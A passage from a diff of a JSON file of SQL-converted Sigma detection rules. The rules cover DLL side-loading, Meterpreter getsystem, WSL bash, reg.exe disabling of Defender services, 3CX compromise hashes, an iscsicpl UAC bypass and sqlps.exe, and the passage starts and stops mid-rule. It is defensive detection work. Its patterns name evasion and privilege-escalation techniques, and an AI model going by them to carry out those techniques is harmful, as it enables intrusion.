ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "status": "experimental", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Other security solution installers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", - "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image 